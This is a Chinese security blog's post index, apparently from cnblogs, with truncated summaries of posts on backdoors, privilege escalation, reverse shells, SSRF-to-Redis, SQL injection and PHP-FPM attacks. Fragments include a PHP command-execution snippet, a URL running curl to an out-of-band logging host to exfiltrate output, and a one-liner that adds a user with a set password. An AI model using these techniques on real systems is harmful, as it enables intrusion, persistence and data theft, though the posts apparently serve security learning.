2020年5月23日
摘要: 环境的配置 1. 编译DLL文件 2.IIS的安装 后门的安装 阅读全文
posted @ 2020-05-23 14:38 冬泳怪鸽 阅读(1434) 评论(2) 推荐(0) 编辑
  2020年3月11日
摘要: 信息 攻击 总结 阅读全文
posted @ 2020-03-11 01:00 冬泳怪鸽 阅读(3116) 评论(0) 推荐(0) 编辑
  2020年3月8日
摘要: 信息 加速源 攻击 注意的地方 阅读全文
posted @ 2020-03-08 17:49 冬泳怪鸽 阅读(1718) 评论(0) 推荐(0) 编辑
  2019年12月27日
摘要: php 存在命令执行,但是不会直接回显,所以需要特殊的指令把结果带出来。 <?php $cmd = $_GET[ ]; ; shell 需要注册个账号,然后会给你分配个域名 访问: http://106.13.124.93/test.php?cmd=curl http://snrkgl.ceye.i 阅读全文
posted @ 2019-12-27 16:41 冬泳怪鸽 阅读(1584) 评论(0) 推荐(0) 编辑
  2019年12月25日
摘要: [TOC] ssh软连接 添加用户 修改/etc/sudoers文件 suid后门 crontab反弹shell后门 ssh免密登录 ssh wrapper后门 inetd strace后门 协议后门 icmp 使用情况:主机从内到外的服务也被仅用了很多,但是icmp没有被禁用(一般很少禁用ping 阅读全文
posted @ 2019-12-25 22:36 冬泳怪鸽 阅读(2351) 评论(0) 推荐(0) 编辑
  2019年12月20日
摘要: [TOC] 1.suid提权 搜索符合条件的可以用来提权的: 搜索可以提权的程序,一般有以下 : 举例:find提权 发现find可以利用 普通用户,进入到/tmp目录下,然后新建一个文件。 会发现已经是root权限 ​ 2.rbash绕过 1. 2. 尝试用以下来绕过 最后用13成功绕过了rbas 阅读全文
posted @ 2019-12-20 21:26 冬泳怪鸽 阅读(19379) 评论(1) 推荐(2) 编辑
  2019年12月3日
摘要: 代码 file dict gopher Redis ① 构造gopher协议包 此处为php马,也可以构造反弹的shell。如果使用反弹shell,对于ubuntu靶机来说是特殊的,不过作者已经考虑到了,所以直接构造就可以了,不用管什么软链接。 ②访问ip/ssrf.php?url= 用burp截包 阅读全文
posted @ 2019-12-03 11:51 冬泳怪鸽 阅读(1203) 评论(0) 推荐(0) 编辑
  2019年11月29日
摘要: nc反弹 当nc没有 e选项的时候 nc 存在 e选项的时候 bash socat 脚本语言: telnet: awk: crontab: 针对交互式不友好 一句话增加用户 useradd newuser;echo "newuser:password"|chpasswd 例:useradd gues 阅读全文
posted @ 2019-11-29 22:32 冬泳怪鸽 阅读(373) 评论(0) 推荐(0) 编辑
  2019年11月25日
摘要: [TOC] 1.常用的代码中的sql查询方式 2.union注入 3.盲注(布尔,延时) 3.1常用函数 ascii(): ord(): char(): mid(str,start[,n]): substr(str,start[,end]): left(str,n): regexp like lim 阅读全文
posted @ 2019-11-25 23:04 冬泳怪鸽 阅读(570) 评论(0) 推荐(0) 编辑
  2019年11月16日
摘要: 环境的安装 " https://www.cnblogs.com/zaqzzz/p/11870489.html " 1.nginx的畸形访问 2. fpm未授权访问 3.fpm未授权访问存在 open_basedir 的限制 4.ssrf+FastCgi 阅读全文
posted @ 2019-11-16 08:15 冬泳怪鸽 阅读(1186) 评论(0) 推荐(0) 编辑